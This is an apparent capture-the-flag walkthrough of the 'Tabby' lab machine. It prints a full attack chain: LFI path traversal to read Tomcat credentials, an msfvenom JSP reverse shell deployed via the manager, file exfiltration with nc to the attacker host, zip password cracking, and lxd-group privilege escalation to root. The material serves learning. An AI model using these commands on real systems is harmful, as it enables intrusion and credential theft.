✅Tabby (Easy)
Lesson Learn
Report-Penetration
Vulnerable Exploit: LFI
System Vulnerable: 10.10.10.194
Vulnerability Explanation: The application is vulnerable to LFI which could allow us to view the tomcat-users.xml file and gave us access to Manager Interface. We can deploy the payload and gain access to the machine.
Privilege Escalation Vulnerability: Misconfigure of lxd group
Vulnerability Fix: Sanitized user input
Severity: High
Step to Compromise the Host:
Reconnaissance
└─$ nmap -p- -sC -sV -T4 10.10.10.194 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-29 11:59 EST
Nmap scan report for 10.10.10.194
Host is up (0.040s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
Port 80 Apache/2.4.41
Running gobuster to find hidden directory background.
└─$ gobuster dir -u http://10.10.10.194 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.194
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/29 12:04:32 Starting gobuster in directory enumeration mode
===============================================================
/files (Status: 301) [Size: 312] [--> http://10.10.10.194/files/]
/assets (Status: 301) [Size: 313] [--> http://10.10.10.194/assets/]
/server-status (Status: 403) [Size: 277]
===============================================================
2021/11/29 12:07:39 Finished
===============================================================
By clicking on the NEWS button it redirect me to megahosting.htb domain. Let add to hosts.
Once we found parameter file, we will test on LFI.
http://megahosting.htb/news.php?file=../../../../etc/passwd
Port 8080 Apache Tomcat
There are interesting path on the webpage, /etc/tomcat9/tomcat-users.xml, /host-manager/html, /manager/html.
As the application is vulnerable to LFI. We can perform Path traversal to execute users.xml.
Tomcat Path
But it doesn't response anything. By checking the path on our local machine,
find / -name tomcat-users.xml
/usr/share/tomcat9/etc/tomcat-users.xml
/etc/tomcat9/tomcat-users.xmlGET /news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1
username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"admin-gui: gives the user the ability to configure the Host Manager application using the graphical web interface.
manager-script: gives the user the ability to configure the Manager application using the text interface instead of the graphical web interface.
On /manager/html, it returns access denied.
on /host-manager/html, it's working.
Exploitation
We can deploy service which contain revershell code.
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.24 LPORT=1234 -f war > shell.war
Payload size: 1098 bytes
Final size of war file: 1098 bytesUse curl command to upload our payload.
└─$ curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/deploy?path=/shell --upload-file shell.war
OK - Deployed application at context path [/shell]Start netcat listener on port 1234 and going to execute the payload.
nc -lvp 1234
http://10.10.10.194:8080/shell
Privilege Escalation
Shell as ash
on /var/www/html, there is zip file. We can transfer by netcat. On our machine, let start netcat listener on port 444.
nc -lvp 4444 > 16162020_backup.zipOn victim machine
tomcat@tabby:/var/www/html/files$ cat 16162020_backup.zip | nc 10.10.14.24 4444We can check the md5sum to confirms after transfer, the file still the same.
tomcat@tabby:/var/www/html/files$ md5sum 16162020_backup.zip
f0a0af346ad4495cfdb01bd5173b0a52 16162020_backup.ziplet crack the zip file
└─$ zip2john 16162020_backup.zip > 16162020_backup.txt
16162020_backup.zip/var/www/html/assets/ is not encrypted!
ver 1.0 16162020_backup.zip/var/www/html/assets/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/favicon.ico PKZIP Encr: 2b chk, TS_chk, cmplen=338, decmplen=766, crc=282B6DE2
ver 1.0 16162020_backup.zip/var/www/html/files/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/index.php PKZIP Encr: 2b chk, TS_chk, cmplen=3255, decmplen=14793, crc=285CC4D6
ver 1.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/logo.png PKZIP Encr: 2b chk, TS_chk, cmplen=2906, decmplen=2894, crc=2F9F45F
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/news.php PKZIP Encr: 2b chk, TS_chk, cmplen=114, decmplen=123, crc=5C67F19E
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/Readme.txt PKZIP Encr: 2b chk, TS_chk, cmplen=805, decmplen=1574, crc=32DB9CE3
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
└─$ john 16162020_backup.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it (16162020_backup.zip)
1g 0:00:00:01 DONE (2021-11-30 01:09) 0.9090g/s 9417Kp/s 9417Kc/s 9417KC/s adnc153..adilizinha
Use the "--show" option to display all of the cracked passwords reliably
Session completedLet switch to user ash with password we found.
tomcat@tabby:/var/www/html/files$ su ash
Password:
ash@tabby:/var/www/html/files$ whoami
ash
ash@tabby:/var/www/html/files$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)Shell as root
User ash is part of lxd group.
On our kali Linux machine,
└─$ sudo apt update
└─$ sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
└─$ sudo go get -d -v github.com/lxc/distrobuilde
[~/go/src/github.com]
└─$ git clone https://github.com/lxc/distrobuilder 128 ⨯
Cloning into 'distrobuilder'...
remote: Enumerating objects: 4909, done.
remote: Counting objects: 100% (1770/1770), done.
remote: Compressing objects: 100% (932/932), done.
remote: Total 4909 (delta 1155), reused 1341 (delta 822), pack-reused 3139
Receiving objects: 100% (4909/4909), 1.72 MiB | 1.12 MiB/s, done.
Resolving deltas: 100% (3141/3141), done.
└─$ make
└─$ mkdir -p $HOME/ContainerImages/alpine/
└─$ cd $HOME/ContainerImages/alpine/
└─$ wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
└─$ sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
┌──(pwned㉿kali)-[~/ContainerImages/alpine]
└─$ mv lxd.tar.xz rootfs.squashfs ~/Desktop/HTB/tabby Let transfer both the files to our victim machine. Let start HTTP server first.
python -m SimpleHTTPServer 80ash@tabby:/tmp/test$ wget http://10.10.14.24/lxd.tar.xz
ash@tabby:/tmp/test$ wget http://10.10.14.24/rootfs.squashfslxc command error
ash@tabby:/tmp$ /snap/bin/lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04
ash@tabby:/tmp$ lxd init
Command 'lxd' is available in '/snap/bin/lxd'
The command could not be located because '/snap/bin' is not included in the PATH environment variable.
lxd: command not found
ash@tabby:/tmp$ /snap/bin/lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (lvm, zfs, ceph, btrfs, dir) [default=zfs]:
Create a new ZFS pool? (yes/no) [default=yes]:
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=5GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like the LXD server to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
By running the command to add image via web shell it doesn't work and need to access by ssh.
ash@tabby:/tmp$ /snap/bin/lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
Error: open lxd.tar.xz: no such file or directoryCreate ssh-keygen
ash@tabby:~/.ssh$ ssh-keygen -f ash
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ash
Your public key has been saved in ash.pub
The key fingerprint is:
SHA256:A00C3sLJV3A0jHPkDAx9yXwW5No73zCio3YVa3IL0B0 ash@tabby
The key's randomart image is:
+---[RSA 3072]----+
| o=+OBoo. |
| + o=XBoE |
| * +=++.. |
| o...oo |
| .S .o |
| o.=. |
| *+.o |
| . o..+ + |
| ..o.. . . |
+----[SHA256]-----+ash@tabby:~/.ssh$ mv ash.pub authorized_keysCopy the content of private key to our kali machine.
└─$ chmod 600 id_rsa
└─$ ssh -i id_rsa ash@10.10.10.194
ash@tabby:/tmp$ wget 10.10.14.24/lxd.tar.xz
ash@tabby:/tmp$ wget 10.10.14.24/rootfs.squashfs
ash@tabby:/tmp$ lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
Image imported with fingerprint: bd0cf6d4dd19e5897e47710b009eaf09c98a42c68490f7d724ab35fbb599507f
ash@tabby:/tmp$ lxc image list
+--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
| alpine | bd0cf6d4dd19 | no | Alpinelinux 3.8 x86_64 (20211130_1340) | x86_64 | CONTAINER | 2.21MB | Nov 30, 2021 at 1:47pm (UTC) |
+--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
ash@tabby:/tmp$ lxc init alpine privesc -c security.privileged=true
Creating privesc
ash@tabby:/tmp$ lxc list
+---------+---------+------+------+-----------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+---------+---------+------+------+-----------+-----------+
| privesc | STOPPED | | | CONTAINER | 0 |
+---------+---------+------+------+-----------+-----------+
ash@tabby:/tmp$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
ash@tabby:/tmp$ lxc start privesc
ash@tabby:/tmp$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # whoami
root
~ # pwd
/root
~ # cd /mnt
/mnt # ls
root
/mnt # cd root/
/mnt/root/root # cd .ssh/
/mnt/root/root/.ssh # ls
authorized_keys id_rsa id_rsa.pubCopy the content of the id_rsa under root user to our machine.
└─$ touch root_rsa
└─$ chmod 600 root_rsa
└─$ ssh -i root_rsa root@10.10.10.194 
Last updated